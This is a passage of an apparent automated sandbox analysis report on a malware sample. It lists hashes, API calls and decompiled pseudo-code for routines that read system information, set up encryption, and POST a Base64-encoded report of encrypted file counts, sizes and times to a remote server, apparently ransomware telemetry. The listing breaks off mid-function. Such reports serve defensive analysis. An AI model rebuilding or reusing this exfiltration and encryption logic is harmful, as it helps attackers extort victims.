                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
                                    • Instruction ID: a4cfbd202773137b3d5cac9fa628adb43f671732b21f4072b2ea178205ee5206
                                    • Opcode Fuzzy Hash: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
                                    • Instruction Fuzzy Hash: 3321D030240B04AAE6766A15DC06FA6B7E1BB44B05F75493CE2C2344F18BF5749ADF04
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F587410(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
                                    				void* _v8;
                                    				long _t14;
                                    				long _t18;
                                    
                                    				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
                                    				if(_t14 != 0) {
                                    					return 0;
                                    				} else {
                                    					_a8 = _a20;
                                    					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
                                    					if(_t18 != 0) {
                                    						GetLastError();
                                    						RegCloseKey(_v8);
                                    						return 0;
                                    					} else {
                                    						_t11 = _t18 + 1; // 0x1, executed
                                    						RegCloseKey(_v8); // executed
                                    						return _t11;
                                    					}
                                    				}
                                    			}






                                    0x0f587426
                                    0x0f587430
                                    0x0f587484
                                    0x0f587432
                                    0x0f587435
                                    0x0f587447
                                    0x0f58744f
                                    0x0f587466
                                    0x0f58746f
                                    0x0f58747b
                                    0x0f587451
                                    0x0f587454
                                    0x0f587457
                                    0x0f587463
                                    0x0f587463
                                    0x0f58744f

                                    APIs
                                    • RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,0000060C,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587426
                                    • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000080,?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587447
                                    • RegCloseKey.KERNEL32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587457
                                    • GetLastError.KERNEL32(?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F587466
                                    • RegCloseKey.ADVAPI32(?,?,0F587885,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F58746F
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Close$ErrorLastOpenQueryValue
                                    • String ID:
                                    • API String ID: 2437438455-0
                                    • Opcode ID: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
                                    • Instruction ID: 5f62967033a2f304c42e657828e8f883623c85e2f16a5d1cc562925364204c76
                                    • Opcode Fuzzy Hash: 889eda5d5441cb2653253f79228a414cccca63a382716b783fe56d459cbf1f2a
                                    • Instruction Fuzzy Hash: FB01213260011DFBDB109F94ED05DDA7F68EB08362B104162FE05E6221D7329A35BBE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0F586550(void** __ecx) {
                                    				void** _v8;
                                    				void* _t19;
                                    				void* _t20;
                                    				void* _t24;
                                    
                                    				_push(__ecx);
                                    				_v8 = __ecx;
                                    				_t19 = VirtualAlloc(0, 0x123, 0x3000, 4); // executed
                                    				_v8[1] = _t19;
                                    				_t20 = VirtualAlloc(0, 0x515, 0x3000, 4); // executed
                                    				 *_v8 = _t20;
                                    				_v8[3] = 0x123;
                                    				_v8[2] = 0x515;
                                    				_t13 =  &(_v8[1]); // 0xc7000000
                                    				_t24 = E0F5863E0( *_t13,  &(_v8[3]),  *_v8,  &(_v8[2])); // executed
                                    				if(_t24 == 0) {
                                    					_v8[4] = 1;
                                    				}
                                    				_v8[4] = 0;
                                    				return _v8;
                                    			}







                                    0x0f586553
                                    0x0f586554
                                    0x0f586565
                                    0x0f58656e
                                    0x0f58657f
                                    0x0f586588
                                    0x0f58658d
                                    0x0f586597
                                    0x0f5865b5
                                    0x0f5865b9
                                    0x0f5865c3
                                    0x0f5865c8
                                    0x0f5865c8
                                    0x0f5865d2
                                    0x0f5865df

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000123,00003000,00000004,?,?,0F584B9E), ref: 0F586565
                                    • VirtualAlloc.KERNEL32(00000000,00000515,00003000,00000004,?,0F584B9E), ref: 0F58657F
                                      • Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000000,0F584B96,?,0F584B9E), ref: 0F5863F8
                                      • Part of subcall function 0F5863E0: GetLastError.KERNEL32(?,0F584B9E), ref: 0F586402
                                      • Part of subcall function 0F5863E0: CryptAcquireContextW.ADVAPI32(0F584B9E,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F584B9E), ref: 0F58641E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AcquireAllocContextCryptVirtual$ErrorLast
                                    • String ID:
                                    • API String ID: 3824161113-0
                                    • Opcode ID: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
                                    • Instruction ID: 3fa041b42630bf18f33f63427462cb35c558df6ff126a82b1f3e654db32ba0ff
                                    • Opcode Fuzzy Hash: 47bf80f2a39cd22d1aba5b3947724de666973a605887893bb868280e874ae63d
                                    • Instruction Fuzzy Hash: 0E11F774A41208EBD704DF94CA95F99BBF5EB88705F208188E904AB381D7B5AF119B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E0F5853D0(CHAR* __ecx, CHAR* __edx, void* _a4) {
                                    				int _v8;
                                    				void* _v12;
                                    				CHAR* _v16;
                                    				void* _v20;
                                    				void** _v24;
                                    				void* _v28;
                                    				void* _v32;
                                    				char _v36;
                                    				void* _v84;
                                    				CHAR* _v88;
                                    				intOrPtr _v92;
                                    				intOrPtr _v96;
                                    				char _v104;
                                    				short _v128;
                                    				void* __esi;
                                    				int _t40;
                                    				BYTE* _t41;
                                    				int _t43;
                                    				void* _t61;
                                    				void* _t65;
                                    				void* _t68;
                                    				void* _t69;
                                    				intOrPtr _t71;
                                    				CHAR* _t80;
                                    				char* _t82;
                                    				CHAR* _t83;
                                    				void* _t84;
                                    				CHAR* _t88;
                                    				int _t96;
                                    				void* _t98;
                                    				void* _t99;
                                    				int _t100;
                                    				void* _t101;
                                    				long _t102;
                                    				BYTE* _t103;
                                    				CHAR* _t105;
                                    				void* _t106;
                                    				void* _t108;
                                    
                                    				_t82 = __ecx;
                                    				_v16 = __edx;
                                    				_t40 = lstrlenA(__ecx) + 1;
                                    				_v8 = _t40;
                                    				_t3 = _t40 + 1; // 0x2
                                    				_t102 = _t3;
                                    				_t41 = VirtualAlloc(0, _t102, 0x3000, 0x40);
                                    				_v20 = _t41;
                                    				if(_t41 == 0 || _v8 >= _t102) {
                                    					_t103 = 0;
                                    					__eflags = 0;
                                    				} else {
                                    					_t103 = _t41;
                                    				}
                                    				_t98 = 0;
                                    				_t43 = CryptStringToBinaryA(_t82, 0, 1, _t103,  &_v8, 0, 0);
                                    				_t116 = _t43;
                                    				if(_t43 == 0) {
                                    					GetLastError();
                                    					goto L14;
                                    				} else {
                                    					_t96 = _v8;
                                    					E0F585F00(_t103, _t96, _t103);
                                    					asm("xorps xmm0, xmm0");
                                    					_t88 =  &_v36;
                                    					asm("movdqu [ebp-0x20], xmm0");
                                    					E0F5833E0(_t88, _t116, _t103);
                                    					if(_v36 != 0) {
                                    						E0F585350();
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						asm("int3");
                                    						_push(_t82);
                                    						_push(_t103);
                                    						_t83 = _t88;
                                    						_v96 = _t96;
                                    						_push(0);
                                    						_v88 = _t83;
                                    						E0F587E40( &_v104);
                                    						_v92 = E0F585220();
                                    						_t99 = 0x400 + lstrlenA(_t83) * 2;
                                    						_t22 = _t99 + 1; // 0x1
                                    						_t84 = VirtualAlloc(0, _t22, 0x3000, 0x40);
                                    						_v84 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
                                    						__eflags = _t84;
                                    						if(_t84 == 0) {
                                    							L20:
                                    							_t105 = 0;
                                    							__eflags = 0;
                                    						} else {
                                    							_t24 = _t99 + 1; // 0x1
                                    							__eflags = _t99 - _t24;
                                    							if(_t99 >= _t24) {
                                    								goto L20;
                                    							} else {
                                    								_t105 = _t84;
                                    							}
                                    						}
                                    						lstrcatA(_t105, _v16);
                                    						asm("movdqu xmm0, [0xf58fb40]");
                                    						asm("movdqu [ebp-0x78], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb50]");
                                    						asm("movdqu [ebp-0x68], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb60]");
                                    						asm("movdqu [ebp-0x58], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb70]");
                                    						asm("movdqu [ebp-0x48], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb80]");
                                    						asm("movdqu [ebp-0x38], xmm0");
                                    						asm("movdqu xmm0, [0xf58fb90]");
                                    						asm("movdqu [ebp-0x28], xmm0");
                                    						lstrlenA(_t105);
                                    						_t100 = 0;
                                    						_push(lstrlenW( &_v128));
                                    						_push( &_v128);
                                    						_push(L"POST");
                                    						_push(0x31fff);
                                    						_push(_v12);
                                    						_push(lstrlenA(_t105));
                                    						_push(_t105);
                                    						_t106 = _v20;
                                    						_push(L"popkadurak");
                                    						_push(_t106);
                                    						_t61 = E0F588050( &_v32);
                                    						__eflags = _t61;
                                    						if(_t61 != 0) {
                                    							__eflags = _a4;
                                    							_t100 = 1;
                                    							if(_a4 != 0) {
                                    								_v16 = 0;
                                    								_t68 = E0F5853D0(_v12,  &_v16);
                                    								__eflags = _t68;
                                    								if(_t68 == 0) {
                                    									_t100 = 0;
                                    									__eflags = 0;
                                    								} else {
                                    									_t69 = _v16;
                                    									__eflags = _t69;
                                    									if(_t69 != 0) {
                                    										 *_v24 = _t69;
                                    									}
                                    								}
                                    							}
                                    						}
                                    						VirtualFree(_t106, 0, 0x8000);
                                    						VirtualFree(_v12, 0, 0x8000);
                                    						VirtualFree(_t84, 0, 0x8000);
                                    						_t65 = _v28;
                                    						__eflags = _t65;
                                    						if(_t65 != 0) {
                                    							InternetCloseHandle(_t65);
                                    						}
                                    						return _t100;
                                    					} else {
                                    						_t101 = _v32;
                                    						_t71 =  *0xf592a60; // 0x0
                                    						_t108 = _v28;
                                    						_t72 =  !=  ? 0 : _t71;
                                    						_v12 = 1;
                                    						 *0xf592a60 =  !=  ? 0 : _t71;
                                    						if(_t108 != 0) {
                                    							_t80 = VirtualAlloc(0, lstrlenA(_t108) + 1, 0x3000, 4);
                                    							 *_v16 = _t80;
                                    							if(_t80 != 0) {
                                    								lstrcpyA(_t80, _t108);
                                    							}
                                    						}
                                    						_t73 = GetProcessHeap;
                                    						if(_t101 != 0) {
                                    							HeapFree(GetProcessHeap(), 0, _t101);
                                    							_t73 = GetProcessHeap;
                                    						}
                                    						if(_t108 != 0) {
                                    							HeapFree( *_t73(), 0, _t108);
                                    						}
                                    						_t98 = _v12;
                                    						L14:
                                    						VirtualFree(_v20, 0, 0x8000);
                                    						return _t98;
                                    					}
                                    				}
                                    			}









































                                    0x0f5853d9
                                    0x0f5853db
                                    0x0f5853e5
                                    0x0f5853ed
                                    0x0f5853f0
                                    0x0f5853f0
                                    0x0f5853f6
                                    0x0f5853fc
                                    0x0f585401
                                    0x0f58540c
                                    0x0f58540c
                                    0x0f585408
                                    0x0f585408
                                    0x0f585408
                                    0x0f58540e
                                    0x0f58541b
                                    0x0f585421
                                    0x0f585423
                                    0x0f5854dc
                                    0x00000000
                                    0x0f585429
                                    0x0f585429
                                    0x0f58542e
                                    0x0f585433
                                    0x0f585436
                                    0x0f58543a
                                    0x0f58543f
                                    0x0f585447
                                    0x0f5854e4
                                    0x0f5854e9
                                    0x0f5854ea
                                    0x0f5854eb
                                    0x0f5854ec
                                    0x0f5854ed
                                    0x0f5854ee
                                    0x0f5854ef
                                    0x0f5854f6
                                    0x0f5854f7
                                    0x0f5854f8
                                    0x0f5854fa
                                    0x0f5854fd
                                    0x0f585501
                                    0x0f585504
                                    0x0f58550f
                                    0x0f585525
                                    0x0f58552c
                                    0x0f585542
                                    0x0f585546
                                    0x0f585549
                                    0x0f58554b
                                    0x0f585558
                                    0x0f585558
                                    0x0f585558
                                    0x0f58554d
                                    0x0f58554d
                                    0x0f585550
                                    0x0f585552
                                    0x00000000
                                    0x0f585554
                                    0x0f585554
                                    0x0f585554
                                    0x0f585552
                                    0x0f58555e
                                    0x0f585564
                                    0x0f58556d
                                    0x0f585572
                                    0x0f58557a
                                    0x0f58557f
                                    0x0f585587
                                    0x0f58558c
                                    0x0f585594
                                    0x0f585599
                                    0x0f5855a1
                                    0x0f5855a6
                                    0x0f5855ae
                                    0x0f5855b3
                                    0x0f5855bc
                                    0x0f5855c5
                                    0x0f5855c9
                                    0x0f5855ca
                                    0x0f5855d2
                                    0x0f5855d7
                                    0x0f5855e1
                                    0x0f5855e2
                                    0x0f5855e3
                                    0x0f5855e9
                                    0x0f5855ee
                                    0x0f5855ef
                                    0x0f5855f4
                                    0x0f5855f6
                                    0x0f5855f8
                                    0x0f5855fc
                                    0x0f585601
                                    0x0f585609
                                    0x0f585610
                                    0x0f585615
                                    0x0f585617
                                    0x0f585627
                                    0x0f585627
                                    0x0f585619
                                    0x0f585619
                                    0x0f58561c
                                    0x0f58561e
                                    0x0f585623
                                    0x0f585623
                                    0x0f58561e
                                    0x0f585617
                                    0x0f585601
                                    0x0f585637
                                    0x0f585643
                                    0x0f58564d
                                    0x0f58564f
                                    0x0f585652
                                    0x0f585654
                                    0x0f585657
                                    0x0f585657
                                    0x0f585665
                                    0x0f58544d
                                    0x0f58544d
                                    0x0f585452
                                    0x0f585459
                                    0x0f58545c
                                    0x0f58545f
                                    0x0f585466
                                    0x0f58546d
                                    0x0f585481
                                    0x0f58548a
                                    0x0f58548e
                                    0x0f585492
                                    0x0f585492
                                    0x0f58548e
                                    0x0f58549e
                                    0x0f5854a5
                                    0x0f5854ad
                                    0x0f5854af
                                    0x0f5854af
                                    0x0f5854b6
                                    0x0f5854be
                                    0x0f5854be
                                    0x0f5854c0
                                    0x0f5854c3
                                    0x0f5854cd
                                    0x0f5854db
                                    0x0f5854db
                                    0x0f585447

                                    APIs
                                    • lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853DF
                                    • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853F6
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F58541B
                                    • lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585477
                                    • VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585481
                                    • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585492
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854AD
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854BE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854CD
                                    • GetLastError.KERNEL32(?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854DC
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5855B3
                                    • lstrlenW.KERNEL32(?), ref: 0F5855BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
                                    • InternetCloseHandle.WININET(0F58581B), ref: 0F585657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
                                    • String ID: POST$popkadurak
                                    • API String ID: 1287001821-2707760125
                                    • Opcode ID: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
                                    • Instruction ID: 07cc2bf360f6f6a29bb15e7d02c1104266da83b48d801c3e1682e08f9cf90ea1
                                    • Opcode Fuzzy Hash: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
                                    • Instruction Fuzzy Hash: 7371B371E00309BBDB10ABA5DD45FAEBF78FF88722F144125EA04B7241EB789546CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E0F585670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				void* _v20;
                                    				char _v164;
                                    				void* __esi;
                                    				BYTE* _t33;
                                    				int _t41;
                                    				CHAR* _t44;
                                    				int _t52;
                                    				void* _t53;
                                    				char _t60;
                                    				BYTE* _t65;
                                    				char* _t69;
                                    				signed int _t70;
                                    				void* _t75;
                                    				signed int _t78;
                                    				CHAR* _t85;
                                    				int _t87;
                                    				long _t88;
                                    				void* _t89;
                                    				void* _t91;
                                    				void* _t94;
                                    
                                    				_t82 = __edx;
                                    				_t70 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __ecx;
                                    				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                    				_v20 = _t33;
                                    				if(_t33 == 0) {
                                    					_t65 = 0;
                                    					_t85 = 0;
                                    				} else {
                                    					_t4 =  &(_t33[0x800]); // 0x800
                                    					_t85 = _t4;
                                    					_t65 = _t33;
                                    				}
                                    				_push(_v12);
                                    				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_t94 = _t91 + 0x14;
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				E0F583BC0( &_v164);
                                    				E0F587490( &_v164, _t82);
                                    				E0F5872A0( &_v164);
                                    				E0F5870A0( &_v164, _t65 + lstrlenW(_t65) * 2);
                                    				_t41 = lstrlenW(_t65);
                                    				_t75 =  *0xf592a78; // 0x0
                                    				_v8 = _t41;
                                    				if(_t75 != 0) {
                                    					VirtualFree(_t75, 0, 0x8000);
                                    				}
                                    				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    				 *0xf592a78 = _t44;
                                    				if(_t44 != 0) {
                                    					wsprintfA(_t44, "%S", L"popkadurak");
                                    					_t94 = _t94 + 0xc;
                                    				}
                                    				_t87 = _v8 + _v8;
                                    				E0F585F00(_t65, _t87, _t87);
                                    				_v16 = _v8 * 8;
                                    				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
                                    					GetLastError();
                                    				}
                                    				_t22 = lstrlenA(_t85) + 4; // 0x4
                                    				_t88 = _t22;
                                    				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
                                    				_t52 = lstrlenA(_t85);
                                    				_t78 = _v12;
                                    				_t53 = _t52 + 2;
                                    				if(_t78 == 0) {
                                    					L11:
                                    					_v8 = 0;
                                    				} else {
                                    					_v8 = _t78;
                                    					if(_t53 >= _t88) {
                                    						goto L11;
                                    					}
                                    				}
                                    				_t89 = 0;
                                    				if(lstrlenA(_t85) != 0) {
                                    					_t69 = _v8;
                                    					do {
                                    						_t60 =  *((intOrPtr*)(_t89 + _t85));
                                    						if(_t60 != 0xa && _t60 != 0xd) {
                                    							 *_t69 = _t60;
                                    							_t69 = _t69 + 1;
                                    						}
                                    						_t89 = _t89 + 1;
                                    					} while (_t89 < lstrlenA(_t85));
                                    				}
                                    				E0F5854F0(_v8, 0, _t78, 0);
                                    				_t68 =  !=  ? 1 : 0;
                                    				VirtualFree(_v12, 0, 0x8000);
                                    				E0F587D70( &_v164);
                                    				VirtualFree(_v20, 0, 0x8000);
                                    				_t59 =  !=  ? 1 : 0;
                                    				return  !=  ? 1 : 0;
                                    			}


























                                    0x0f585670
                                    0x0f585670
                                    0x0f585690
                                    0x0f585693
                                    0x0f585696
                                    0x0f585698
                                    0x0f58569d
                                    0x0f5856a9
                                    0x0f5856ab
                                    0x0f58569f
                                    0x0f58569f
                                    0x0f58569f
                                    0x0f5856a5
                                    0x0f5856a5
                                    0x0f5856ad
                                    0x0f5856bf
                                    0x0f5856c8
                                    0x0f5856ca
                                    0x0f5856cb
                                    0x0f5856d0
                                    0x0f5856d2
                                    0x0f5856d3
                                    0x0f5856d5
                                    0x0f5856d6
                                    0x0f5856d8
                                    0x0f5856d9
                                    0x0f5856db
                                    0x0f5856dc
                                    0x0f5856de
                                    0x0f5856e1
                                    0x0f5856e3
                                    0x0f5856e4
                                    0x0f5856ec
                                    0x0f5856f7
                                    0x0f585702
                                    0x0f585718
                                    0x0f58571e
                                    0x0f585724
                                    0x0f58572a
                                    0x0f58572f
                                    0x0f585739
                                    0x0f585739
                                    0x0f585757
                                    0x0f585759
                                    0x0f585760
                                    0x0f58576d
                                    0x0f585773
                                    0x0f585773
                                    0x0f58577b
                                    0x0f585780
                                    0x0f58578f
                                    0x0f5857a6
                                    0x0f5857a8
                                    0x0f5857a8
                                    0x0f5857be
                                    0x0f5857be
                                    0x0f5857cb
                                    0x0f5857ce
                                    0x0f5857d0
                                    0x0f5857d3
                                    0x0f5857d8
                                    0x0f5857e1
                                    0x0f5857e1
                                    0x0f5857da
                                    0x0f5857da
                                    0x0f5857df
                                    0x00000000
                                    0x00000000
                                    0x0f5857df
                                    0x0f5857e9
                                    0x0f5857ef
                                    0x0f5857f1
                                    0x0f5857f4
                                    0x0f5857f4
                                    0x0f5857f9
                                    0x0f5857ff
                                    0x0f585801
                                    0x0f585801
                                    0x0f585803
                                    0x0f58580a
                                    0x0f5857f4
                                    0x0f585816
                                    0x0f585830
                                    0x0f58583d
                                    0x0f585845
                                    0x0f585854
                                    0x0f585858
                                    0x0f58585e

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F585696
                                    • wsprintfW.USER32 ref: 0F5856BF
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F585708
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F58571E
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585739
                                    • lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F58574B
                                    • VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F585757
                                    • wsprintfA.USER32 ref: 0F58576D
                                    • CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F58579E
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F5857A8
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857B5
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F5857C4
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857CE
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857EB
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F585804
                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F58583D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585854
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
                                    • String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
                                    • API String ID: 823394411-2102589890
                                    • Opcode ID: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
                                    • Instruction ID: 248f84567f179666a6ba6c55420372e62117f4a21e51764751ad9fcf69e89744
                                    • Opcode Fuzzy Hash: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
                                    • Instruction Fuzzy Hash: 5A51D770B00305FFEB24AB64DD86F9E7B78FB44711F540065F601B6282EBB8AA16DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F586BA0(WCHAR* __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				WCHAR* _v16;
                                    				WCHAR* _v20;
                                    				long _v24;
                                    				struct _WIN32_FIND_DATAW _v620;
                                    				int _t38;
                                    				struct _SECURITY_ATTRIBUTES* _t40;
                                    				int _t50;
                                    				WCHAR* _t52;
                                    				intOrPtr _t53;
                                    				void* _t54;
                                    				WCHAR* _t57;
                                    				long _t64;
